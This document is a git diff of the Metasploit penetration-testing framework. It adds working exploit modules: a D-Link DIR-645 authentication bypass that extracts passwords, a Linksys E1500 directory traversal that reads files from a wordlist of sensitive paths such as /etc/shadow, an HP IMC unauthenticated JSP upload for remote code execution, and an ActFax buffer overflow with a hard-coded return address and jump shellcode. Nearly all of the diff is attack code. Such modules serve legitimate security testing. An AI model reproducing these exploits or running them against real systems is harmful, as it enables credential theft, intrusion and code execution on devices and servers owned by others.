diff --git a/data/wordlists/sensitive_files.txt b/data/wordlists/sensitive_files.txt index 5bc6e2a962..79db3e9f44 100755 --- a/data/wordlists/sensitive_files.txt +++ b/data/wordlists/sensitive_files.txt @@ -1,4 +1,5 @@ /etc/passwd +/etc/shadow /etc/groups /etc/mysql.conf /etc/mysql/my.cnf @@ -10,4 +11,5 @@ /etc/motd /etc/fstab /etc/inetd.conf -/etc/xinetd.conf \ No newline at end of file +/etc/xinetd.conf +/proc/version diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb new file mode 100644 index 0000000000..0f98f7352d --- /dev/null +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -0,0 +1,95 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'DLink DIR 645 Password Extractor', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. + With this vulnerability you are able to extract the password for the remote + management. + }, + 'References' => + [ + [ 'OSVDB', '90733' ], + [ 'BID', '58231' ], + [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ] + ], + 'Author' => + [ + 'Roberto Paleari ', # Vulnerability discovery + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE + ) + end + + def run + + vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device") + + #Curl request: + #curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\ '/getcfg.php', + 'method' => 'POST', + 'vars_post' => + { + 'SERVICES' => 'DEVICE.ACCOUNT' + } + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /DIR-645 Ver 1.0/) + return if (res.code == 404) + + if res.body =~ /(.*)<\/password>/ + print_good("#{rhost}:#{rport} - credentials successfully extracted") + + #store all details as loot -> there is some usefull stuff in the response + loot = store_loot("dlink.dir645.config","text/plain",rhost, res.body) + print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") + + res.body.each_line do |line| + if line =~ /(.*)<\/name>/ + @user = $1 + next + end + if line =~ /(.*)<\/password>/ + pass = $1 + vprint_good("user: #{@user}") + vprint_good("pass: #{pass}") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => 'http', + :user => @user, + :pass => pass, + :active => true + ) + end + end + end + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + + end +end diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb new file mode 100644 index 0000000000..4b8801578e --- /dev/null +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -0,0 +1,129 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Linksys E1500 Directory Traversal Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal vulnerability which is present in + different Linksys home routers, like the E1500. + }, + 'References' => + [ + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], + [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], + [ 'BID', '57760' ], + [ 'OSVDB', '89911' ], + [ 'EDB', '24475' ] + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(file,user,pass) + uri = "/apply.cgi" + traversal = '../..' + data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + "submit_type" => "wsc_method2", + "change_action" => "gozila_cgi", + "next_page" => traversal << file + } + }) + + #without res.body.length we get lots of false positives + if (res and res.code == 200 and res.body.length > 0) + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => uri, + :pname => data_trav, + :risk => 3, + :proof => data_trav, + :name => self.fullname, + :category => "web", + :method => "POST" + }) + + loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif (res and res.code) + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + extract_words(datastore['SENSITIVE_FILES']).each do |file| + find_files(file, user, pass) unless file.empty? + end + end +end diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb similarity index 99% rename from modules/auxiliary/admin/http/netgear_sph200d_traversal.rb rename to modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 909afe5443..e7131b9306 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary ) register_options( [ - Opt::RPORT(80), OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 00204eb184..40ddbfb8d7 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') end def target_url @@ -99,8 +99,9 @@ class Metasploit3 < Msf::Auxiliary return :abort end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE + print_error("#{target_url} - UNREACHABLE") + return :abort end end diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 930590bfbb..07022ba8e5 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -176,13 +176,12 @@ class Metasploit3 < Msf::Exploit::Remote # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource - # + # proc = Proc.new do |cli, req| + self.add_resource({'Path' => "/test.mp4", 'Proc' => proc}) rescue nil on_request_uri(cli, req) end - self.add_resource({'Path'=>'/test.mp4', 'Proc'=>proc})# rescue nil - end def on_request_uri(cli, request) diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb new file mode 100644 index 0000000000..8d44ad8ee9 --- /dev/null +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -0,0 +1,115 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in HP Intelligent Management Center. + The vulnerability exists in the mibFileUpload which is accepting unauthenticated + file uploads and handling zip contents in a insecure way. Combining both weaknesses + a remote attacker can accomplish arbitrary file upload. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + }, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-5201' ], + [ 'OSVDB', '91026' ], + [ 'BID', '58385' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ], + [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 07 2013')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + @peer = "#{rhost}:#{rport}" + + # New lines are handled on the vuln app and payload is corrupted + jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") + jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + + # Zipping with CM_STORE to avoid errors while zip decompressing + # on the Java vulnerable application + zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) + zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp) + + post_data = Rex::MIME::Message.new + post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") + + # Work around an incompatible MIME implementation + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + print_status("#{@peer} - Uploading the JSP payload...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" + }) + + if res and res.code == 200 and res.body.empty? + print_status("#{@peer} - JSP payload uploaded successfully") + register_files_for_cleanup(jsp_name) + else + fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") + end + + print_status("#{@peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(jsp_name), + 'method' => 'GET' + }) + + end + +end diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb new file mode 100644 index 0000000000..6638f30c7d --- /dev/null +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ActFax 5.01 RAW Server Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW + Server can be used to transfer fax messages without any underlying protocols. To + note significant fields in the fax being transferred, like the fax number or the + recipient, ActFax data fields can be used. This module exploits a buffer overflow + in the handling of the @F506 fields due to the insecure usage of strcpy. This + module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Craig Freyman', # @cd1zz # discovery and Metasploit module + 'corelanc0d3r', # Metasploit module + 'juan vazquez' # Metasploit module cleanup + ], + 'References' => + [ + [ 'OSVDB', '89944' ], + [ 'BID', '57789' ], + [ 'EDB', '24467' ], + [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ] + ], + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40", + 'DisableNops' => true, + 'Space' => 1024, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX' + } + }, + 'Targets' => + [ + [ 'ActFax 5.01 / Windows XP SP3', + { + 'Ret' => 0x77c35459, # push esp # ret # msvcrt.dll + 'Offset' => 1024 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 5 2013', + 'DefaultTarget' => 0)) + + end + + def exploit + connect + p = payload.encoded + buffer = p + buffer << rand_text(target['Offset'] - p.length) + buffer << [target.ret].pack("V") + buffer << "\x89\xe1" # mov ecx, esp + buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028 + buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500 + buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042 + print_status("Trying target #{target.name}...") + sock.put("@F506 "+buffer+"@\r\n\r\n") + disconnect + end +end +